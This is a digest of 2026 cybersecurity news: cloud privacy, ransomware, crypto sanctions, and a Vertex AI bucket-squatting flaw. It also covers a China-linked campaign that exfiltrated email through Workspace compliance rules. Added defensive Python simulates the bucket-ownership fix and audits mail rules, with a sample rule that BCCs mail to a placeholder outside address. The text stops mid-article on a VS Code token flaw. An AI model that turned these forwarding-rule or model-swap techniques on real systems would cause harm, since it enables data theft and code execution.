Why Privacy-Conscious Users Should Think Twice Before Storing Sensitive Files on Google Drive

Google Drive has become an essential tool for millions of users worldwide. Whether it's storing contacts, backing up WhatsApp chats, or saving photos, videos, and important documents, the platform serves as a central hub for digital storage. Its deep integration with Google's ecosystem makes it a convenient choice for Android and Gmail users alike.

However, while Google Drive offers robust security against cyber threats, questions remain about whether it is the best place to store highly sensitive personal information. Documents such as passport scans, banking records, legal contracts, and tax returns may require an additional layer of protection beyond what the service provides by default.

From a security standpoint, Google Drive employs industry-standard safeguards. Data is encrypted in transit using TLS, and files stored on Google's servers are protected at rest with AES-128 encryption. Users can further strengthen account security through features like passkeys and two-factor authentication.

The key concern, however, lies in how the encryption system works. Unlike services that provide end-to-end encryption, Google retains control of the encryption keys used to access stored files. This means the company has the technical ability to decrypt and view user data when necessary.

"When you upload a file, Google encrypts it with a unique data encryption key, then encrypts that key with another key it controls, and stores both on its servers. To read the file, Google's systems unwrap the keys on the fly. With true end-to-end encryption, only your device holds the key, so even the service provider sees nothing but scrambled bytes. Google's setup doesn't meet that bar."

As a result, while hackers and unauthorized third parties face significant barriers in accessing files, Google itself can access stored content. Additionally, government agencies or courts may compel the company to share user data through legal processes because Google possesses the necessary decryption keys.

Another privacy consideration is automated content scanning. Google uses systems that review files for policy enforcement purposes, including identifying known illegal content and potential violations of its terms of service. Although the company states that Drive content is not used for advertising purposes, automated systems can sometimes generate false positives, potentially leading to account restrictions or suspensions.

Artificial intelligence is also expanding Google's access to stored data. As Gemini becomes more deeply integrated into Workspace products, it requires permission to analyze files in order to generate summaries and provide contextual assistance. While Google maintains that Drive files are not used to train its general AI models, some privacy advocates argue that increased AI integration broadens the potential exposure of personal information.

"This doesn't mean Google is malicious or will snoop on you. It means the threat model is different from what most people assume. You're not just trusting Google to fend off hackers; you're trusting it never to read, mishandle, or be compelled to share your data."

For users seeking stronger privacy protections, encrypting files before uploading them to Google Drive is often recommended. Applications such as Cryptomator allow users to create encrypted vaults on their devices, ensuring that files remain unreadable to Google. VeraCrypt is another option that enables users to create secure encrypted containers that can be synced to cloud storage services.

Those looking for built-in privacy protections may consider alternative platforms. Services such as Proton Drive, Tresorit, and Sync.com offer end-to-end encryption, ensuring that providers cannot access the contents of user files because they do not possess the decryption keys.

There are trade-offs, however. End-to-end encrypted files often cannot be searched by content, previewed in a browser, or edited collaboratively in the same way as standard cloud storage files. Additionally, users are solely responsible for managing recovery credentials, meaning forgotten passwords may result in permanent loss of access.

For particularly sensitive documents, some users may choose to avoid cloud storage altogether. External hard drives or self-hosted solutions such as Nextcloud can provide greater control over personal data while reducing dependence on third-party providers.

Despite these concerns, Google Drive remains a secure and practical solution for everyday storage needs, including photos, shared documents, and routine work files. The issue is less about security and more about privacy.

"The privacy story shifts when you start storing things that would hurt to lose to a stranger, a Google reviewer, or a court order. For those files, the answer isn't to abandon Drive but to stop treating it as a vault. Encrypt sensitive documents before you upload, or move them to a service that can't read them at all. The few minutes of friction are worth knowing that the most personal pieces of your life aren't sitting on a server with someone else's keys."

For privacy-focused users, the best approach may be to continue using Google Drive for convenience while reserving encrypted storage solutions for highly confidential files.

Ransomware Gangs Splinter as Cyber Threat Becomes More Volatile

Cybercrime is moving through a major reset as the ransomware world shifts away from big, organized cartels and toward smaller, more volatile splinter groups. Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, said the underground market has become a highly accessible ecosystem where criminals can buy tools, services, and stolen data with ease. He described it as a place where threat actors can get almost everything they need, except a good drink. 

The biggest driver behind this change is convenience. Cryptocurrencies have removed one of the oldest bottlenecks in cybercrime by making it much easier to cash out illegal profits, while underground marketplaces now provide ransomware kits, phishing services, infrastructure, and support on demand. That lower barrier to entry has blurred the old lines between hacktivists, criminal gangs, and state-linked actors, creating a blended threat environment that is far more crowded and harder to police.

Lyne warned that law enforcement crackdowns are also reshaping the market. When large, centralized groups such as LockBit are disrupted, their affiliates do not disappear; they scatter into smaller factions, each trying to rebuild revenue streams in a less visible way. The result is a more fragmented and “post-trust” criminal scene, where weaker internal controls and looser coordination can make attackers more aggressive, reckless, and unpredictable. 

The threat is also becoming more global. Lyne said the ransomware ecosystem is no longer dominated by traditional Russian-speaking hubs, with actors now emerging from Brazil, Türkiye, and English-speaking groups such as Scattered Spider. At the same time, criminals are increasingly using AI to search through hoarded corporate data, turning old thefts into fresh extortion opportunities and new monetization schemes. 

For police and security teams, the response must go beyond arrests alone. Lyne said the Met Police cannot “arrest its way out” of the problem and instead needs to focus on disrupting infrastructure, weakening trust inside criminal networks, and working more closely with private-sector defenders. In practical terms, that means security teams should expect a ransomware landscape that is smaller in structure but sharper in impact, where fragmented gangs may strike faster and with fewer rules than the cartels they replaced.

Iranian Crypto Giant Nobitex Added to US Sanctions List Amid Terror Financing Probe

The intersection of financial innovation, regulatory oversight, and national security has shaped digital asset platforms for years. Earlier this week, the U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) imposed sanctions on Nobitex, Iran's largest cryptocurrency exchange, as well as three other Iranian digital asset exchanges. The action brought that convergence into sharp focus.

The action, taken as part of the Trump Administration's Economic Fury campaign, reflects a significant concern of the administration: that cryptocurrency infrastructure is being abused both to circumvent international sanctions and to facilitate illicit financial networks associated with government-backed activities.

According to United States authorities, Nobitex allegedly processed more than half of Iran's cryptocurrency inflows in 2025, establishing itself as one of the most important hubs in Iran's digital asset ecosystem. The platform allegedly facilitated transactions related to terror financing, sanctions evasion operations, and entities associated with the Islamic Revolutionary Guard Corps (IRGC), including ransomware-related entities.

According to Treasury officials, the platform was also instrumental in enabling the Central Bank of Iran to obtain substantial stablecoin reserves, highlighting how digital assets are increasingly being used to influence geopolitical and economic affairs. Even though Iran has been economically isolated for many years and has been undergoing mounting geopolitical tension, the digital asset sector has emerged as a significant financial ecosystem. 

Based on industry estimates, the country's cryptocurrency market was worth over $7.78 billion in 2025, reflecting the growing integration of digital assets into both commercial activities and international payment channels.

Based on blockchain intelligence assessments, it is evident that wallet addresses associated with the Islamic Revolutionary Guard Corps (IRGC) accounted for more than half of the total value flowing into Iran's cryptocurrency ecosystem during the fourth quarter of 2025. In this regard, the country’s expanding virtual asset landscape has become increasingly intertwined with national security concerns. Within this environment, exchanges targeted by Washington occupy a dominant position. 

According to Treasury data, Nobitex processed more than 50% of all Iranian digital asset inflows during 2025, whereas Wallex and Bitpin handled approximately 12% and 10%, respectively. Since its establishment in 2018, Ramzinex has facilitated more than $2.45 billion in cumulative transactions, making it one of the nation's longest-running platforms. The figures illustrate why US policymakers have focused in recent years on enforcing sanctions against virtual asset service providers. Increasingly, digital asset networks have emerged as alternatives to conventional financial controls for moving capital, settling transactions, and maintaining access to global liquidity.

Iranian financial institutions are largely excluded from international banking mechanisms, including SWIFT. It has been argued that these platforms have served as critical entry and exit points connecting domestic actors to international cryptocurrency markets, creating pathways through which sanctions may be evaded and funds may be transferred across borders. 

OFAC has announced the latest measures as part of a larger campaign that has already frozen approximately half a billion dollars of cryptocurrency connected to the Iranian regime. A strategic move by Washington to target the country's largest exchanges and associated infrastructure is intended to disrupt the digital financial channels through which sanctioned entities can convert, transfer, store, and repatriate value through the cryptocurrency ecosystem, extending the reach of traditional sanctions into a decentralized financial world. 

The Treasury's latest action, which builds on these allegations, targeted not just a single exchange but what it describes as a broader cryptocurrency infrastructure network underpinning Iran's access to global digital asset markets. In addition to Nobitex, sanctions were imposed on the Iranian exchanges Wallex, Bitpin, and Ramzinex, as well as on several senior executives and Nobitex founders.

Washington identified Amir Hossein Rad, the company's chairman and co-founder, as a key figure within the platform's leadership structure. The Treasury contends that Nobitex matters for more than its market share, alleging that the exchange was a critical financial gateway for state-linked entities, facilitating transactions associated with sanctions evasion, IRGC-related activities, ransomware activity, and the movement of government-controlled assets. The department also claimed that the platform enabled the Central Bank of Iran to access stablecoins worth hundreds of millions of dollars at a time when authorities were seeking a means of supporting the weakening rial and maintaining access to international liquidity outside the traditional banking system.

As outlined by the Treasury Department, the exchange also facilitated access to overseas cryptocurrency platforms for Iranian officials, individuals with political connections, and affiliated entities despite decades of financial restrictions. Furthermore, US authorities claimed that, following the onset of American military operations involving Iran, Nobitex provided transfers of government assets and safeguarded them during periods of domestic internet disruption, demonstrating the growing strategic significance of digital asset networks during geopolitical crises. 

The package also designated co-founders Mohammad Ali Aghamir and Mohammad Aghamir, who heads the company's blockchain division; the Treasury asserted that both maintain close ties to influential Islamic circles. The company's chief executive officer, Seyed Ali Khoei, was also designated as a sanctioned individual because of his significant leadership role.

Aside from Nobitex, Washington identified Wallex as the second-largest cryptocurrency exchange by trading volume in Iran, alleging that it accounted for approximately 12 percent of the country's digital asset inflows in 2025 and facilitated transactions related to the IRGC. Treasury officials indicated that Bitpin processed approximately 10 percent of Iranian digital asset inflows during the same period and allegedly served investors involved in efforts to circumvent US sanctions.

Ramzinex, for its part, has been accused of processing transactions worth more than $2.45 billion since its inception in 2018 and of participating in transactions involving entities associated with the Iranian government and the Islamic Revolutionary Guard Corps. To combat this threat, Washington intends to target not only individual actors but also the digital financial infrastructure that Tehran believes allows it to access, transfer, and repatriate funds beyond conventional sanctions enforcement mechanisms.

Cryptocurrencies are becoming a critical frontier in modern financial security as geopolitical conflict, sanctions enforcement, cybercrime, and digital finance increasingly intersect. In an era when regulators are increasingly paying attention to virtual asset ecosystems beyond traditional banking networks, exchanges and financial service providers are facing increased scrutiny over compliance controls, transaction monitoring, and exposure to jurisdictions with high risk.

For cybersecurity and financial security professionals, this development underscores that digital asset infrastructure is viewed not solely as a technological innovation but also as a strategic component of national security, which makes transparency, risk management, and threat intelligence more critical than ever in an increasingly interconnected financial environment.

META Threat Landscape Report Q1 2026: Ransomware, Data Breaches and Hacktivism Rise Across Middle East, Turkey and Africa

Early 2026 saw sharper cyber aggression throughout the Middle East, Turkey, and Africa, fueled less by isolated incidents than by coordinated ransomware attacks, politically charged hacking efforts, and repeated exposure of sensitive information. Notably, Cyble's regional analysis highlights how public institutions, financial entities, infrastructure firms, and power providers faced relentless pressure from diverse digital adversaries during those months. Amid shifting tactics, one pattern held steady - attack volume climbed without pause. Early in the year, ransomware kept gaining ground across the region. 

Across META nations, 116 cases came to light between January and March. Turkey led the list, with the UAE just behind. South Africa and Egypt were hit hard too, with frequent probes and breakdowns marking their networks. Known crews like Gentlemen, INC Ransom, Qilin, Tengu, and LockBit stayed active throughout the period. Construction was hit hardest, followed by government offices, police departments, banks, and power companies. Because these sectors manage vital systems and confidential information, they draw attackers aiming to profit or cause chaos. 

Notably, ransomware crews are acting more like businesses - some run subscription-style services so partners can launch attacks faster and wider. Terabytes of sensitive files surfaced online, allegedly pulled from Qatar’s energy infrastructure - login details, cloud backups, all circulating without permission. While ransomware grabbed headlines, leaked datasets kept spreading just beneath the surface. Cyber bazaars active throughout the year moved quietly, swapping access tokens and corporate records like currency. Healthcare providers found themselves exposed. So did hotels, sports leagues, even digital influencers promoting brands. 

A single hacker boasted control over massive archives - one claim among many. State agencies showed up repeatedly in breach reports, their systems probed by actors with unclear allegiances. Motives varied: some sought profit, others appeared driven by surveillance goals or national interests. What stands out is how often attackers used known weaknesses to break into systems. Soon after flaws became public, they appeared in hacking attempts - some quickly listed by CISA as actively exploited. Targeting focused heavily on corporate networks, defensive software, and services exposed to the web. 

One standout issue involved Ivanti’s mobile management tool, where a severe bug allowed remote control without login verification. Access like that remains appealing; it skips the need to harvest passwords entirely. Throughout Q1 2026, hacktivism stayed prominently in view. A steady flow of leaked data, altered websites, and network floods hit thousands of online addresses in the META area. Tied closely to simmering global conflicts, especially around Israel and Iran, these actions grew more frequent. Rather than just causing outages, they began serving as tools to push narratives into online conversations. Digital platforms turned into stages where cyber acts echoed real-world disputes. 

Though quiet at first glance, new data from Cyble’s META Threat Landscape Report reveals how quickly digital dangers shift when crime blends with global tensions. Where politics and networks meet, risks climb - especially for firms tied to essential services or disputed industries. Instead of waiting, many now see value in tracking hidden signals, patching weaknesses faster, not just reacting after breaches occur. 

As hostile actors refine methods across the Middle East, Africa, Turkey, and Asia, one thing becomes clear: staying ahead means seeing more, acting sooner, adjusting constantly.

Security Bug in Google Vertex AI Could Allow Model Upload Hijacking

Google has addressed a security flaw in the Python SDK for Vertex AI after researchers demonstrated that attackers could potentially intercept machine learning model uploads and substitute them with malicious files.

The issue was identified by researchers from Palo Alto Networks' Unit 42 team, who disclosed the findings through Google's bug bounty program. According to the researchers, the vulnerability could be exploited without compromising a target organization's cloud environment, stealing credentials, or tricking users through phishing campaigns. Instead, the attack relied on weaknesses in how the SDK handled temporary storage locations during model uploads.

Researchers referred to the technique as "Pickle in the Middle." They reported no evidence that the flaw had been exploited outside of controlled testing environments. Google has since released security updates, and organizations using Vertex AI are advised to upgrade to version 1.148.0 or newer.


Predictable Storage Names Created an Opening

The vulnerability originated from the SDK's automatic staging process.

When developers uploaded a machine learning model without manually specifying a Cloud Storage bucket, the SDK generated a temporary bucket name based on information such as the Google Cloud project identifier and deployment region.

The problem was not that the bucket name could be predicted. The problem was that the SDK only checked whether the bucket existed. It did not verify whether that bucket belonged to the project performing the upload.

Because Cloud Storage bucket names are globally unique across Google Cloud, an attacker could create the expected bucket before the victim did. If that happened, model files uploaded by the victim could be redirected into infrastructure controlled by the attacker.

In practical terms, a developer could believe a model was being uploaded to their own cloud environment while the files were actually being delivered elsewhere.


Attackers Could Replace Models Before Deployment

After receiving the uploaded files, an attacker could modify or replace the model before Vertex AI retrieved it for deployment.

This becomes particularly important because many machine learning workflows rely on serialization formats such as Pickle and Joblib. These formats are commonly used to save trained models, but they also contain functionality capable of executing instructions when the file is loaded.

As a result, a manipulated model may do more than generate predictions. It can potentially run arbitrary code inside the environment responsible for serving the model.

Unit 42 researchers demonstrated that this behavior could be abused to execute attacker-controlled code inside Vertex AI's serving infrastructure.


Researchers Exploited a Narrow Timing Window

The attack required the malicious file replacement to occur very quickly.

During testing, researchers observed that Vertex AI typically retrieved uploaded files roughly 2.5 seconds after the upload process completed.

To exploit this short interval, they created an automated Cloud Function that monitored the attacker-controlled bucket and immediately replaced newly uploaded files. The replacement process took approximately 1.4 seconds, allowing the malicious model to be swapped before Vertex AI accessed it.

This timing-based attack demonstrated that the vulnerability was practical under the right conditions rather than being a purely theoretical risk.


Proof-of-Concept Reached Beyond a Single Model

After achieving code execution, researchers tested what level of access could be obtained from the serving environment.

Their proof-of-concept extracted an OAuth token from the container's metadata service and used it to interact with resources available within Google's managed infrastructure.

According to the report, the token provided visibility into additional machine learning assets, model artifacts, TensorFlow files, BigQuery metadata, access control information, system logs, Kubernetes cluster identifiers, and internal infrastructure references.

The findings suggested that a successful compromise could potentially expose information beyond the originally targeted model deployment.


Exploitation Required Specific Conditions

The vulnerability was not universally exploitable.

Researchers noted that two requirements had to be met before the attack could succeed.

First, the expected default staging bucket could not already exist in the chosen deployment region. Second, the developer needed to rely on the SDK's default bucket-generation behavior rather than specifying a storage bucket manually.

The researchers noted that newly created Vertex AI projects often satisfy the first condition because the default bucket may not yet have been created.


Google Introduced Multiple Fixes

Unit 42 reported the issue to Google on March 5, 2026.

Google's initial response introduced additional randomness into bucket names by appending a UUID value, making bucket prediction substantially more difficult.

The company later strengthened the mitigation by implementing ownership validation checks. These checks ensure that automatically selected buckets belong to the project initiating the upload, preventing bucket-squatting attacks from succeeding.

The ownership verification mechanism was included in Vertex AI SDK version 1.148.0.

At the time the researchers published their findings, neither Google's Vertex AI security advisories nor the research report listed a CVE identifier for the vulnerability.


Recommendations for Organizations

Security teams using Vertex AI should verify that all environments are running updated versions of the google-cloud-aiplatform package. This includes development notebooks, machine learning pipelines, automated build systems, testing environments, and production deployments.

Researchers also recommend explicitly defining a staging bucket owned by the organization instead of relying on SDK defaults. This reduces the risk of storage misconfigurations and provides greater visibility into where machine learning artifacts are stored during deployment.
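To make the difference between the two checks concrete, here is an added simulation (not the Vertex AI SDK's own code, nor Unit 42's): it models the pre-fix existence-only check beside the ownership validation Google shipped in 1.148.0, and the explicitly named, organisation-owned staging bucket the researchers recommend. The project ids, bucket names and the naming scheme are constructed; the real SDK's name format is not given on the page.

```python
"""Constructed simulation (not the Vertex AI SDK's code) of the staging-bucket
check described above. A small in-memory model stands in for Cloud Storage:
bucket names are globally unique and each bucket records its owning project.
The naming scheme below is hypothetical; the real format is not on the page."""
import uuid


class FakeCloudStorage:
    """Global bucket namespace: bucket name -> owning project id."""

    def __init__(self):
        self._buckets = {}

    def exists(self, name):
        return name in self._buckets

    def create(self, name, project):
        # Names are global across all projects, so a taken name stays taken.
        if name in self._buckets:
            raise ValueError(f"bucket {name!r} is already taken")
        self._buckets[name] = project

    def owner(self, name):
        return self._buckets[name]


class BucketSquattingError(RuntimeError):
    """The chosen staging bucket exists but belongs to another project."""


def default_bucket_name(project, region, random_suffix=False):
    """Hypothetical default name derived from project and region. With
    random_suffix=True a UUID is appended, mirroring Google's first mitigation."""
    name = f"{project}-vertex-staging-{region}"
    if random_suffix:
        name = f"{name}-{uuid.uuid4().hex}"
    return name


def resolve_staging_bucket_vulnerable(gcs, project, region):
    """Pre-fix logic as the article describes it: only existence is checked,
    so an already-existing name is used whoever owns it."""
    name = default_bucket_name(project, region)
    if not gcs.exists(name):
        gcs.create(name, project)
    return name


def resolve_staging_bucket_hardened(gcs, project, region, staging_bucket=None):
    """Post-fix logic: the bucket must belong to the calling project.
    staging_bucket lets the caller name an organisation-owned bucket, as the
    researchers recommend, instead of relying on the derived default."""
    name = staging_bucket or default_bucket_name(project, region)
    if not gcs.exists(name):
        gcs.create(name, project)
    elif gcs.owner(name) != project:
        # The decisive check the vulnerable version lacked.
        raise BucketSquattingError(
            f"{name!r} exists but is owned by {gcs.owner(name)!r}, not {project!r}")
    return name


def squatting_scenario(victim="victim-project", attacker="attacker-project",
                       region="us-central1"):
    """Replay the article's scenario with constructed project ids: the name the
    victim's SDK will derive has already been registered by another project.
    Returns where each resolver would send the victim's model files."""
    gcs = FakeCloudStorage()
    gcs.create(default_bucket_name(victim, region), attacker)

    vulnerable_target = resolve_staging_bucket_vulnerable(gcs, victim, region)
    try:
        resolve_staging_bucket_hardened(gcs, victim, region)
        hardened_outcome = "used default bucket"
    except BucketSquattingError:
        hardened_outcome = "refused: bucket owned by another project"

    # An explicit bucket owned by the victim's own project is accepted.
    gcs.create("victim-owned-staging", victim)
    explicit_target = resolve_staging_bucket_hardened(
        gcs, victim, region, staging_bucket="victim-owned-staging")

    return {
        "vulnerable_target_owner": gcs.owner(vulnerable_target),
        "hardened_outcome": hardened_outcome,
        "explicit_target": explicit_target,
    }


if __name__ == "__main__":
    for key, value in squatting_scenario().items():
        print(f"{key}: {value}")
```

The vulnerable resolver silently hands the victim's upload to whichever project registered the name first; the hardened one refuses unless the bucket is the caller's own, which is the behaviour to expect from 1.148.0 onward.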

The disclosure is the latest example of how weaknesses in supporting cloud infrastructure can affect AI systems. As organizations continue moving model development and deployment into managed cloud platforms, security reviews must extend beyond the model itself to include storage, deployment pipelines, permissions, and the services that support the AI lifecycle.

Crypto Exploit Losses Plummet 90% in May to $68.3 Million as Thieves Hit Security Wall

Crypto thieves are hitting a major wall, with exploit losses plunging nearly 90% in May 2026. Blockchain security firm CertiK reported that crypto platform losses fell to $68.3 million last month, a dramatic drop from the staggering $650 million stolen in April. This sharp decline signals improved security measures across the industry and makes May the third month in 2026 in which losses stayed below $100 million. 

Code vulnerabilities were responsible for the bulk of May's damage, accounting for roughly 66% of total losses at approximately $45 million. Cross-chain bridges took the heaviest hit by category, absorbing 42% of total losses or $28.6 million. Despite the marked decrease, the sector wasn't entirely free from high-profile incidents, though the overall attack success rate has significantly diminished compared to previous months. 

The positive trend reflects multiple factors working together to protect crypto assets. Improved security measures and rapid response capabilities are driving this improvement, even as vulnerabilities persist across the ecosystem. CertiK's data shows that attackers are facing stronger defenses, with platforms implementing more robust protection systems and responding faster to emerging threats. This defensive upgrade is forcing crypto thieves to "hit a wall" as their traditional exploit methods become less effective. 

May 2026's performance stands in stark contrast to the previous quarter's chaos. The nearly 90% drop demonstrates that the industry is learning from past mistakes and adapting quickly to attack vectors. While $68.3 million in losses remains concerning, the trajectory is clearly positive, with monthly losses trending downward consistently through early 2026. Investors and platform operators are seeing tangible benefits from increased security investments. 

This security improvement offers hope for the cryptocurrency industry's long-term viability. As platforms strengthen their defenses and response times, the success rate for exploits continues declining. The trend suggests that crypto thieves are struggling to adapt to newer security protocols, marking a turning point in the ongoing battle between attackers and defenders. While attacks will continue, the dramatic reduction in losses indicates the industry is finally building effective walls against digital theft.

Ransomware Gang Apologizes After Mistakenly Attacking CIS Company and Revealing Criminal Errors

Surprisingly, even cybercriminal collectives slip up sometimes - a fact highlighted when attackers struck a business inside a CIS country. A misstep by Nova, tied to the RAlord network, led to unintended consequences. Following an accidental hit on Eriell Group - an oilfield services leader based in Tashkent with operations extending into Russia - affiliates backtracked publicly. The group formally expressed regret over targeting such a firm. Apologies emerged only after internal protocols appeared breached. Mistaken identity seems to have triggered the reversal. Trust among criminal actors likely took a quiet blow. 

Reports indicate that after Eriell reached out to Nova, alerting them to the mistake, the link between the operator and the group was cut. The individual involved was banned soon afterward and lost access entirely. Instead of resistance came a structured, deliberate apology, followed by assistance provided freely and framed as support rather than restitution. The group's stance: no encryption took place, the data remains unpublished, and its intent is unclear but outwardly cooperative. Still, the unwritten code among major ransomware groups holds: steer clear of Russian and broader CIS networks. 

Even though hacking violates local laws there, officials routinely ignore profit-driven breaches if they spare homegrown entities. Some hacking collectives like DragonForce, VanHelsing, and LockBit ban strikes on Russian-linked targets. Despite that, the Nova member tied to the Eriell breach probably won’t earn trust among peers again quickly. Though rules exist, breaking unwritten loyalties carries consequences few overlook. It's happened before - threat actors stumbling through avoidable errors. 

Back then, a ransom-driven team called Scattered Lapsus$ Hunters announced full control over Resecurity, a firm focused on digital defense, boasting they’d extracted every piece of stored information. In reality, their intrusion led straight into a trap set long in advance: a decoy system designed to mislead. That slip gave authorities what they needed - not just tracking one participant but securing legal grounds to pursue evidence further. 

Besides earlier cases, attention turned to CyberVolk - a pro-Russian hacktivist collective - that rolled out ransomware yet embedded the primary decryption keys directly within the code. Because of this oversight, those affected found a way to unlock data freely, bypassing any payment. Mistakes like these undermined the entire scheme before it gained traction. Wrong moves in coding sometimes backfire. 

The team behind Sicarii built a system that made fresh encryption keys on each launch - yet wiped the matching private key right after. Because of this, users had no way to unlock data, payment or not. In another case, Nitrogen’s tool failed due to a nearly identical error, leaving its decryption method useless. Paying up became meaningless when recovery was impossible by design. Certain missteps reveal a different side - those behind cyberattacks aren’t flawless. 

Though often seen as highly skilled, people running ransomware schemes act mainly for money; yet just like others, they slip up, leaving openings that can unexpectedly help those targeted.

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions


A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.
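The review described above, as an added example that is not part of the GTIG report: it scores mail-rule change events for the pattern used here (a content compliance rule that quietly copies matching mail to an outside mailbox). The event records use a constructed, simplified shape, and the tenant domain, admin list and sample rules are placeholders; a real Admin console audit export follows Google's own schema and must be mapped onto RuleChangeEvent first.

```python
"""Review Google Workspace mail-rule change events for the abuse pattern
described above: a content compliance rule that copies matching mail to an
outside mailbox. Added example; field names are a constructed simplification.
"""
from dataclasses import dataclass


@dataclass
class RuleChangeEvent:
    timestamp: str
    actor: str               # admin account that made the change
    action: str              # "create", "update" or "delete"
    rule_name: str
    match_terms: list[str]   # keywords / addresses the rule watches for
    rule_actions: list[str]  # "add_bcc:<addr>", "forward:<addr>", "quarantine", ...


INTERNAL_DOMAINS = {"hospital.example"}            # constructed tenant domain
APPROVED_ADMINS = {"mailadmin@hospital.example"}   # constructed change approvers
KEYWORD_THRESHOLD = 50   # DLP rules are normally narrow; ~150 terms is a red flag


def copy_destinations(event: RuleChangeEvent) -> list[str]:
    """Addresses a rule silently copies or forwards matching mail to."""
    found = []
    for act in event.rule_actions:
        kind, _, target = act.partition(":")
        if kind in ("add_bcc", "forward") and target:
            found.append(target.strip().lower())
    return found


def external_destinations(event, internal_domains=INTERNAL_DOMAINS):
    """Copy destinations whose domain is not one the organisation owns."""
    return [d for d in copy_destinations(event)
            if d.rsplit("@", 1)[-1] not in internal_domains]


def review_rule(event, internal_domains=INTERNAL_DOMAINS,
                approved_admins=APPROVED_ADMINS) -> list[str]:
    """Reasons a rule change deserves analyst attention; empty means benign."""
    reasons = []
    if event.action == "delete":
        return reasons          # deletions are reviewed by a separate process
    ext = external_destinations(event, internal_domains)
    if ext:
        reasons.append("copies mail to external address(es): " + ", ".join(ext))
    if len(event.match_terms) >= KEYWORD_THRESHOLD:
        reasons.append(f"watches {len(event.match_terms)} terms "
                       f"(threshold {KEYWORD_THRESHOLD})")
    if event.actor not in approved_admins:
        reasons.append(f"changed by unapproved admin {event.actor}")
    return reasons


def review_events(events):
    """Map rule name -> reasons, for every event that raised at least one."""
    flagged = {}
    for event in events:
        reasons = review_rule(event)
        if reasons:
            flagged[event.rule_name] = reasons
    return flagged


# Constructed sample events: one ordinary DLP rule and one modelled on the
# "Patroit" rule (its term list is synthetic apart from two page keywords).
SAMPLE_EVENTS = [
    RuleChangeEvent("2024-02-01T09:12:00Z", "mailadmin@hospital.example", "create",
                    "Block SSN leakage", ["ssn", "social security number"],
                    ["quarantine"]),
    RuleChangeEvent("2025-03-14T02:41:00Z", "svc-backup@hospital.example", "create",
                    "Patroit",
                    ["chikungunya", "uncrewed"] + [f"term{i}" for i in range(140)],
                    ["add_bcc:collector-placeholder@gmail.example"]),
]

if __name__ == "__main__":
    for name, reasons in review_events(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```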

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

Researcher Reveals VS Code Flaw That Could Expose GitHub Access Tokens Through a Single Click

A publicly disclosed security flaw affecting the browser-based version of Visual Studio Code has drawn attention from developers after a researcher demonstrated how attackers could potentially obtain GitHub authentication tokens through a single user interaction.

The issue was disclosed by security researcher Ammar Askar, who published technical details alongside proof-of-concept code showing how the vulnerability could be abused. At the time of disclosure, no CVE identifier had been assigned and Microsoft had not released an official software patch.

According to Askar's analysis, the weakness exists within github.dev, GitHub's web-based development environment that allows users to work with repositories directly from a browser using technology derived from Visual Studio Code. The attack takes advantage of the way VS Code's webview components communicate with the main editor environment.

Webviews are embedded browser windows used by extensions and web applications to display interactive content. While these components are designed to operate within restricted environments, the researcher found a method to abuse the message-passing mechanism that connects a webview to the editor interface.

